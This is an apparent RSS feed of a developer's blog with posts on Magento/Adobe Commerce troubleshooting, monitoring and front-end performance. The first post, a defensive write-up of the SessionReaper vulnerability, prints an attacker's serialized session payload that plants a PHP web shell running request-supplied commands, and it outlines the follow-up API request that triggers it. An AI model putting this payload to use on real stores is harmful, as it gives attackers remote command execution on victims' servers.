Jekyll2025-10-29T15:23:06+00:00https://maxchadwick.xyz/feed.xmlMax ChadwickMy WebsitemaxpchadwickShutting Down File Upload Controllers for SessionReaper is futile2025-10-29T00:00:00+00:002025-10-29T00:00:00+00:00https://maxchadwick.xyz/blog/shutting-down-file-upload-controllers-for-session-reaper-is-futileSince Searchlight Cyber published a technical write up and proof-of-concept for the SessionReaper vulnerability, attackers have been mass scanning Magento / Adobe Commerce stores for vulnerable targets. The first phase of the attack involves uploading a payload containing malicious session data to the server.

$ cat pub/media/customer_address/s/e/sess_aly4jr1awshxasfgwwboqeiqn3
_|O:31:"GuzzleHttp\Cookie\FileCookieJar":4:{S:7:"cookies";a:1:{i:0;O:27:"GuzzleHttp\Cookie\SetCookie":1:{S:4:"data";a:3:{S:7:"Expires";i:1;S:7:"Discard";b:0;S:5:"Value";S:161:"<?php if (!hash_equals('4009d3fa8132195a2dab4dfa3affc8d2', md5(md5($_REQUEST['pass'] ?? '')))) { header('Location:404.php'); exit; } system($_REQUEST['cmd']); ?>";}}}S:10:"strictMode";N;S:8:"filename";S:16:"./errors/503.php";S:19:"storeSessionCookies";b:1;}

Next, the attacker sends a request to the /rest/default/V1/guest-carts/:cartId/order endpoint, manipulating the savePath property of the sessionConfig object such that the malicious session will be initialized.

To protect against this vulnerability it is critical to apply Adobe’s patch which adds validation to the API request handling to control which types of objects can be created, preventing manipulation of the sessionConfig.

diff --git a/vendor/magento/framework/Webapi/ServiceInputProcessor.php b/vendor/magento/framework/Webapi/ServiceInputProcessor.php
index ba58dc2bc7acf..06919af36d2eb 100644
--- a/vendor/magento/framework/Webapi/ServiceInputProcessor.php
+++ b/vendor/magento/framework/Webapi/ServiceInputProcessor.php
@@ -246,6 +246,13 @@ private function getConstructorData(string $className, array $data): array
             if (isset($data[$parameter->getName()])) {
                 $parameterType = $this->typeProcessor->getParamType($parameter);

+                // Allow only simple types or Api Data Objects
+                if (!($this->typeProcessor->isTypeSimple($parameterType)
+                    || preg_match('~\\\\?\w+\\\\\w+\\\\Api\\\\Data\\\\~', $parameterType) === 1
+                )) {
+                    continue;
+                }
+
                 try {
                     $res[$parameter->getName()] = $this->convertValue($data[$parameter->getName()], $parameterType);
                 } catch (\ReflectionException $e) {

However, implementing this patch alone does not stop an attacker from performing phase 1 of the attack and uploading the malicious session files.

I have noticed a lot of discussion about this, with some recommending patching the Magento\Customer\Controller\Address\File\Upload class to immediately bail and not run at all.

While I can understand this inclination, it ultimately is the wrong solution to the problem. It is expected that frontend users are able to upload files to the server for some uses cases (as is common functionality with many web applications). In the core Adobe Commerce codebase (not Magento Open Source) there are 3 other frontend controllers that accept file uploads. It is very common functionality in 3rd party extensions such swissuplabs Order Attachments.

Ultimately, applying the Adobe patch to prevent abuse is the best solution to the issue. Beyond that, additional validation to the contents of a proposed file upload (for example searching for signatures indicative of malware such as an opening PHP tag) could help prevent these types of uploads from making it to your server.

]]>
maxpchadwick
Chrome Developer Tools Network Tab Filter by ‘not’ status code2025-01-10T00:00:00+00:002025-01-10T00:00:00+00:00https://maxchadwick.xyz/blog/chrome-developer-tools-status-code-is-notRecently a co-worker reported sporadic 500-range errors on a website he was performing testing on. I was trying to gather some information on what was happening and wanted to use the “Network” tab in Chrome DevTools to show me the following requests

  1. Only requests to the domain of the specific website (e.g. filter out all 3rd party requests)
  2. All non 200 responses

Step one I knew how to do…in the filter search enter domain:example.com (replacing example.com with the actual domain for the project), however I was unsure how to complete the second step.

Through some Googling I eventually discovered that it is possible to do a negative search by pre-pending the - symbol to the field on which you are filtering.

Putting this all together, I landed on the following filter search

domain:example.com -status-code:200

Here’s a screenshot of how the looks in DevTools when visiting amazon.com.

Screenshot of filtering in DevTools network panel

Hope you find this helpful.

]]>
maxpchadwick
Mixin is not a function in Magento / Adobe Commerce2024-12-17T00:00:00+00:002024-12-17T00:00:00+00:00https://maxchadwick.xyz/blog/adobe-commerce-mixin-is-not-a-functionA few weeks back I found myself staring at the following error on a Magento project.

TypeError: originalPlaceOrderFunction(paymentData,messageContainer).done is not a function. (In 'originalPlaceOrderFunction(paymentData,messageContainer).done(function(response){if(paymentData.method==='subscribe_pro'){$(document).trigger('subscribepro:orderPlaceAfter',[response]);}})', 'originalPlaceOrderFunction(paymentData,messageContainer).done' is undefined);

The error was firing in some cases when the user attempted to click the place order button. Googling wasn’t much help nor was the error message especially clear about the exact cause. As such I figured I’d do a quick write up to help any future developers who might find themselves in the same shoes.

The Backtrace

The backtrace from the error pointed toward the place-order-mixin.js file which was included as part of the Subscribe Pro extension:

Ref: https://github.com/subscribepro/subscribepro-magento2-ext/blob/8ea9593e3f734f42f3ae462c70cda5d14f5f470a/view/frontend/web/js/action/checkout/place-order-mixin.js#L10

Given that the error was pointing toward a file within the Subscribe Pro module, my first inclination was that this was a bug within their module, however that turned out to not be the case.

Applying Some Critical Thinking

Thinking more about the error I realized that if .done was “not a function”, that would indicate that originalPlaceOrderFunction was not a deferred object. Knowing that multiple mixins can be declared on a single JavaScript component / function I became suspicious that perhaps the problem wasn’t with Subscribe Pro itself, but rather another mixin returning an unexpected type such as Boolean prior to the Subscribe Pro code running.

Locating The Problematic Mixin

Searching the code I found another mixin also hooked into Magento_Checkout/js/action/place-order that was intended to validate that the quote’s shipping address contained a phone number.

define([
    'mage/utils/wrapper',
    'Magento_Checkout/js/model/quote',
    'mage/translate',
    'Magento_Ui/js/model/messageList'
], function (wrapper, quote, $t, messageList) {
    'use strict';

    return function (placeOrderFunction) {
        return wrapper.wrap(placeOrderFunction, function (originalPlaceOrder, paymentData, messageContainer) {
            var shippingAddress = quote.shippingAddress();
            if (!shippingAddress['telephone']) {
                messageList.addErrorMessage({ message: $t('Phone Number is missing on the Shipping Address.') });
                return false;
            }
            return originalPlaceOrder(paymentData, messageContainer);
        });
    };
});

A-ha! So this mixin was returning false if the quote’s shipping address was missing a phone number. The Subscribe Pro code was subsequently trying to hook into the same function, but failing as it was receiving Boolean rather than the expected type.

Fixing the issue would ultimately require refactoring this code to handle phone number validation in a different way, rather than short-circuiting the place-order action.

Lesson learned: If you’re authoring a mixin, make sure you are returning the expected type for compatibility with other mixins.

]]>
maxpchadwick
Segfaults when using ionCube or SourceGuardian wih the New Relic PHP Agent2024-12-06T00:00:00+00:002024-12-06T00:00:00+00:00https://maxchadwick.xyz/blog/segfaults-when-using-ioncube-or-sourceguardian-with-new-relic-php-agentOver the past few months I’ve seen reports from multiple clients about problems saving and updating product information on their Adobe Commerce stores. We originally saw the issue back in August and I need to give credit to Nemanja Djuric from Webscale as he was actually the one who identified the root cause.

There is a known issue when using versions > 10.17.0.7 of the New Relic PHP Agent with ionCube or SourceGuardian installed (which was the case on all the projects where we saw this issue). The problem is apparently connected to a known issue in PHP core with the observable API.

When this has come up, downgrading the New Relic PHP agent to 10.17.0.7 as recommended here has solved the problem, however it also appears that there is a fix in PHP core and upgrading to a to PHP >= 8.2.23 / 8.3.11 may also be a viable option.

]]>
maxpchadwick
Why 404s Aren’t Cached in Adobe Commerce2024-11-22T00:00:00+00:002024-11-22T00:00:00+00:00https://maxchadwick.xyz/blog/why-404s-arent-cached-in-adobe-commerceRecently I was investigating an outage on a client website where a large spike in traffic generating a 404 response was at play.

Screenshot of traffic spike

Reviewing the requests in detail, I noticed that the same URLs were being hit repeatedly within a short time frame, however the responses never came from cache.

This lead me to the question…why wouldn’t a 404 response be served from cache? I reached out to Adobe support and learned a few things. In this post I will share my findings.

Keeping the response “fresh”

The initial explanation I got from Adobe was essentially that the page contents of the could change (e.g. an item comes back in stock) so it’s best not to cache the 404 page to make sure each user sees a fresh response each time.

That made sense to me to some degree, however on the flip side, when the outage that occured the same page was being loaded repeatedly in a very short period of time causing the site to beecome unstable. I thought a happy medium might be to cache the page, but only for a short amount of time (e.g. 5 minutes).

The security concern

As I began to figure out how to implement caching of the 404 page I stumbled upon the commit which originally prevented 404 caching. The commit added the following directive to Magento\Cms\Controller\Noroute\Index::execute.

$resultPage->setHeader('Cache-Control', 'no-store, no-cache, must-revalidate, max-age=0', true);

Looking closely at the commit, I noticed the author name was “pawan-adobe-security”.

Screenshot of commit

Commit: https://github.com/magento/magento2/commit/b91e690faf2056861276db10d99acfe83a1bdc06

The fact that “security” was in the username set off some alarm bells to me. I followed up with Adobe for more details and they shared the following scenario.

  1. User A leaves a review for Product X. User A will have access to view the review via their account at e.g. example.com/review/customer/view/id/XXX
  2. User B sends a request to example.com/review/customer/view/id/XXX prior to User A having visited it. The response is a 404 which is now cached
  3. User A can now tries to view the review from their account, however they can’t as the 404 response has been cached

I realized this is technically a type of a denial of service, and it could be expanded to other endpoints such as viewing an order from the customer’s account.

While the likelyhood of abuse seems low, no-cache-ing the 404 seems to be a necesary evil to prevent this potential abuse scenario.

]]>
maxpchadwick
Viewing Origin Response on Adobe Commerce Cloud2024-11-14T00:00:00+00:002024-11-14T00:00:00+00:00https://maxchadwick.xyz/blog/viewing-origin-response-on-adobe-commerce-cloudRecently I was working through an issue on an Adobe Commerce Cloud project where I was interested to see the raw response headers issued by the Magento backend. With Adobe Commerce Cloud, requests are typically routed through Fastly which removes and modifies the origin response headers. My searching and testing wasn’t turning up a solution for my needs. Adobe provides documentation on how to “bypass” Fastly. While this is useful in some cases, such as preventing specific pages from being cached, it still doesn’t allow visibility into the raw response.

I opened a support ticket with Adobe and they provided the below answer. Since I couldn’t find it documented anywhere publicly, I figured I’d share it here.

The Solution

This is possible by SSH-ing to the backend server and issuing the following curl command directly to localhost:8080 (replace www.example.com with the domain of the website you are trying to access).

$ curl -D - -o /dev/null -s http://localhost:8080/ -H "X-Forwarded-Proto: https" -H "Host: www.example.com"

I had tried something similar (using curl --resolve) prior to contacting Adobe, but hadn’t been able to get it to work.

The example above would load the home page of example.com. The localhost URL path can also be changed to load a specific page. For example, in my case I was interested to see the response headers of the 404 page, which I achieved as follows.

$ curl -D - -o /dev/null -s http://localhost:8080/404 -H "X-Forwarded-Proto: https" -H "Host: www.example.com"
]]>
maxpchadwick
FACET-ing New Relic PageViewTiming Data By ‘Page Type’2024-11-07T00:00:00+00:002024-11-07T00:00:00+00:00https://maxchadwick.xyz/blog/newrelic-custom-attribute-page-typeNew Relic’s PageViewTiming data set provides excellent visibility into important performance metrics such as Core Web Vitals. When analyzing this data it can be useful to segment it by “page type” — for example, on an ecommerce website it can be helpful to know LCP or CLS scores for the product detail page, or product listing page individually. While it’s possible to view performance metrics for specific page URLs via the default pageUrl field, a website can have thousands (or more) of unique URLs for a given page type. Unless a predictable and consistent pattern is used for all URLs of a specific page type, by default it is not possible to segment data this way.

New Relic “Custom Attributes”

This issue can be solved by using New Relic custom attributes, which will be available when querying the PageViewTiming data set. The browser agent provides a setCustomAttribute function, which can be used for this purpose.

For example, in the case of Magento / Adobe Commerce, the “page type” can be identified consulting the list of classList of the <body> element. The below snippet can be used to quickly and easily set the pageType attribute for the product and category pages.

<script>
    (function() {
        if (!window.newrelic) {
            return;
        }

        if (document.body.classList.contains('catalog-category-view')) {
            newrelic.setCustomAttribute('pageType', 'catalog/category/view');
            return;
        }

        if (document.body.classList.contains('catalog-product-view')) {
            newrelic.setCustomAttribute('pageType', 'catalog/product/view');
            return;
        }
    })();
</script>

Once in place, pageType can be used for FACET-ing and WHERE clauses in your NRQL queries.

]]>
maxpchadwick
Add an IP Address to a Fastly ACL via the CLI with Magento2023-07-20T00:00:00+00:002023-07-20T00:00:00+00:00https://maxchadwick.xyz/blog/add-an-ip-to-fastly-acl-via-cli-magentoRecently I was in a bit of a pickle on a new Magento project that my company was taking over.

Access to the staging site was restricted via Fastly. I had SSH access to the environment, but my IP address was not allowed via the ACL, so I couldn’t connect to the website’s backend UI to grant myself access.

I wound up figuring out how to manage this via the CLI. Since I struggled a bit with figuring this out I figured I’d shared my findings here.

The Endpoint to Call

IP addresses can be added to an ACL via the “Create an ACL entry” resource.

The request looks like this

POST /service/[service_id]/acl/[acl_id]/entry

The IP address is then passed in the request body along with other parameters such as a comment

Figuring Out The Service ID

Assuming you are using Magento Cloud the Service ID (and Fastly Key) can be found in the /mnt/shared/fastly_tokens.txt file. “API Token” is the FASTLY_KEY and “Serivce ID” is the SERVICE_ID.

Finding the ACL ID

First, get the active version. You can do this as follows, assuming you have jq installed.

# Get the active version. In this example 105 is active
$ curl --silent -H "Fastly-Key: FASTLY_KEY" https://api.fastly.com/service/SERVICE_ID/version \
  | jq '.[] | if .active then .number else empty end'
105

Next review the list of ACLs for that version

$ curl --silent -H "Fastly-Key: FASTLY_KEY" https://api.fastly.com/service/SERVICE_ID/version/VERSION/acl | jq

Here you will find the id of the ACL you want to append to

Adding the IP

You can certainly issue a curl request, but another option is to do this with n98-magerun2 dev:console, which is how I did it. The commands I ran looked like this…

$ XDG_CONFIG_HOME=~/var/ var/n98-magerun2.phar dev:console
>>> $api = $di->get('Fastly\Cdn\Model\Api')
>>> $api->upsertAclItem(ACL_ID, IP_TO_INSERT, null, COMMENT)
]]>
maxpchadwick
What CURLOPT_FAILONERROR does in PHP2023-04-12T00:00:00+00:002023-04-12T00:00:00+00:00https://maxchadwick.xyz/blog/curlopt-failonerror-php-behavior

Testing for this blog post was done with PHP version 8.2.1

During a recent code review I learned about CURLOPT_FAILONERROR for the first time.

I read through both the libcurl documentation as well as the PHP documentation and in the end was still unclear exactly what this option does.

In this post I’ll share my findings from some experimentation.

What the libcurl documentation says

The libcurl documentation describes the behavior as follows:

Request failure on HTTP response >= 400

A long parameter set to 1 tells the library to fail the request if the HTTP code returned is equal to or larger than 400. The default action would be to return the page normally, ignoring that code.

When this option is used and an error is detected, it will cause the connection to get closed and CURLE_HTTP_RETURNED_ERROR is returned.

Source: https://curl.se/libcurl/c/CURLOPT_FAILONERROR.html

What the PHP documentation says

true to fail verbosely if the HTTP code returned is greater than or equal to 400. The default behavior is to return the page normally, ignoring the code.

Source: https://www.php.net/manual/en/function.curl-setopt.php

My Questions

Reading through these pieces of documentation I was left with a few questions

  • What is the definition “fail the request” (from the libcurl documentation) or “fail” from the PHP documentation?
  • What will curl_exec return if the request “fails”? The libcurl documentation seems to suggest the return value will be CURLE_HTTP_RETURNED_ERROR.

First order of business: What is CURLE_HTTP_RETURNED_ERROR?

The first thing I was interested in was what the CURLE_HTTP_RETURNED_ERROR const evaluated to in PHP. Using php -r here’s what I found:

$ php -r 'var_dump(CURLE_HTTP_RETURNED_ERROR) . PHP_EOL;'
int(22)
$ php -r 'var_dump((bool)CURLE_HTTP_RETURNED_ERROR) . PHP_EOL;'
bool(true)

Given these findings it seemed unlikely to me that PHP would actually return CURLE_HTTP_RETURNED_ERROR if the request “failed” (would it really return a truth-y value?), despite what the libcurl documentation had to say.

Running some tests

First, I created a simple script that would return an HTTP 503 response code and a response body with the string “error”.

<?php

http_response_code(503);

echo 'Error' . PHP_EOL;

Next I used php -S to run a server on port 1234 that would execute that script.

$ php -S localhost:1234
[Wed Apr 12 21:30:36 2023] PHP 8.2.1 Development Server (http://localhost:1234) started

Then, I created a script that would send a request to my server, to test the behavior of CURLOPT_FAILONERROR.

<?php

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'http://localhost:1234');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FAILONERROR, true);

$response = curl_exec($ch);

var_dump($response) . PHP_EOL;
var_dump(curl_error($ch) . PHP_EOL);

Finally, I got the response.

$ php test.php
bool(false)
string(38) "The requested URL returned error: 503
"

What I learned

Based on this test, here’s what I learned about what CURLOPT_FAILONERROR does in PHP

  • If the URL returns an HTTP status code >= 400, curl_exec will return false
    • CURLOPT_RETURNTRANSFER cannot be used to access the response body when this option is used
  • curl_error will return a message indicating the HTTP status code that was received.

My conclusion

Ultimately CURLOPT_FAILONERROR doesn’t seem like a great option since it discards the response body, which might have useful information in the case of a failure. The CURLINFO_HTTP_CODE option of curl_getinfo seems like a better way the handle error unexpected HTTP response codes.

]]>
maxpchadwick
Experimenting with Partytown2022-12-22T00:00:00+00:002022-12-22T00:00:00+00:00https://maxchadwick.xyz/blog/experimenting-with-partytownA couple weeks back in a Twitter conversation I learned about Partytown.

I was immediately intrigued by the idea and saw great potential, especially on the ecommerce projects that I work on on a daily basis.

Today I spent some time playing with Partytown. In this post I’ll share my process and findings.

Methodology

For my use-case I was looking to quickly test some potential performance optimizations against a remote website that I didn’t have a copy of running locally. The website was running Adobe Commerce (a.k.a. Magento) on the Adobe Commerce Cloud infrastructure.

Running this type of testing is a task that comes up somewhat frequently for me and my current favorite way to do this is using Chrome developer tools local overrides.

Partytown publishes some documentation on how to integrate into plain old HTML although I did find it a bit confusing. Here’s what I wound up doing.

Get a copy of the Partytown code

First we get a copy of the Partytown code

# Make a random temporary folder
mkdir test && cd test

# Install Partytown
npm install @builder.io/partytown

# Use partytown copylib to obtain the code for web publishing
# Partytown wants to use ~partytown as the directory name
# but the ~ in the folder name needs to be escaped and is annoying
node node_modules/@builder.io/partytown/bin/partytown.cjs copylib partytown

Now your partytown directory should look something like this…

partytown
├── debug
│   ├── partytown-atomics.js
│   ├── partytown-media.js
│   ├── partytown-sandbox-sw.js
│   ├── partytown-sw.js
│   ├── partytown-ww-atomics.js
│   ├── partytown-ww-sw.js
│   └── partytown.js
├── partytown-atomics.js
├── partytown-media.js
├── partytown-sw.js
└── partytown.js

Upload the code to the remote server

Per the Partytown documentation, the code needs to be hosted from the origin domain. I attempted to simpy drop my partytown directory into my local overrides folder for the website, however Chrome was complaining that the service worker file wasn’t being loaded with the correct MIME type. To get around this I just uploaded the files to the remote server (maybe there’s a better way to do this?).

On Adobe Commerce Cloud was can drop them into the pub/media folder.

# Zip up the code
zip -r partytown.zip partytown

# scp it up
scp partytown.zip user@host:~/pub/media

# SSH in and unzip it
ssh user@host
cd pub/media
unzip partytown

Add The Partytown Snippet to the head

Using local overrides inline the snippet into the <head> of the document. This will look something like this.

Note that we have to manually replace /~partytown with /media/partytown.

<script>
/* Partytown 0.7.3 - MIT builder.io */
!function(t,e,n,i,r,o,a,d,s,c,p,l){function u(){l||(l=1,"/"==(a=(o.lib||"/media/partytown/")+(o.debug?"debug/":""))[0]&&(s=e.querySelectorAll('script[type="text/partytown"]'),i!=t?i.dispatchEvent(new CustomEvent("pt1",{detail:t})):(d=setTimeout(w,1e4),e.addEventListener("pt0",f),r?h(1):n.serviceWorker?n.serviceWorker.register(a+(o.swPath||"partytown-sw.js"),{scope:a}).then((function(t){t.active?h():t.installing&&t.installing.addEventListener("statechange",(function(t){"activated"==t.target.state&&h()}))}),console.error):w())))}function h(t){c=e.createElement(t?"script":"iframe"),t||(c.setAttribute("style","display:block;width:0;height:0;border:0;visibility:hidden"),c.setAttribute("aria-hidden",!0)),c.src=a+"partytown-"+(t?"atomics.js?v=0.7.3":"sandbox-sw.html?"+Date.now()),e.body.appendChild(c)}function w(t,n){for(f(),t=0;t<s.length;t++)(n=e.createElement("script")).innerHTML=s[t].innerHTML,e.head.appendChild(n);c&&c.parentNode.removeChild(c)}function f(){clearTimeout(d)}o=t.partytown||{},i==t&&(o.forward||[]).map((function(e){p=t,e.split(".").map((function(e,n,i){p=p[i[n]]=n+1<i.length?"push"==i[n+1]?[]:p[i[n]]||{}:function(){(t._ptf=t._ptf||[]).push(i,arguments)}}))})),"complete"==e.readyState?u():(t.addEventListener("DOMContentLoaded",u),t.addEventListener("load",u))}(window,document,navigator,top,window.crossOriginIsolated);
</script>

Test your optimizations

Before making any changes, use Chrome developer tools and run a lighthouse scan.

Next identify some potential problematic third-party scripts. Add the type="text/partytown" attribute to those scripts in your local override. Then re-run the Lighthouse score to observe the impact.

My findings

I tested this on a client staging site today and had very positive results:

Initial Metrics

  • TBT - 2,250ms
  • Third party blocking time - 970ms

Accessibe snippet moved to Partytown

  • TBT - 1,950ms
  • Third party blocking time - 640ms

Accessibe + Grin snippets moved to Partytown

  • TBT - 1,420ms
  • Third party blocking time - 680ms (I don’t think Lighthouse knows that Grin is 3rd party)

Accessibe + Grin + PowerReviews moved to Partytown

  • TBT - 620ms
  • Third party blocking time - 270ms

Conclusion

I’ve just scratched the surface so far with Partytown, but am very excited about the positive performance improvements it can offer for many websites (especially ecommerce). Hope you found this article helpful!

]]>
maxpchadwick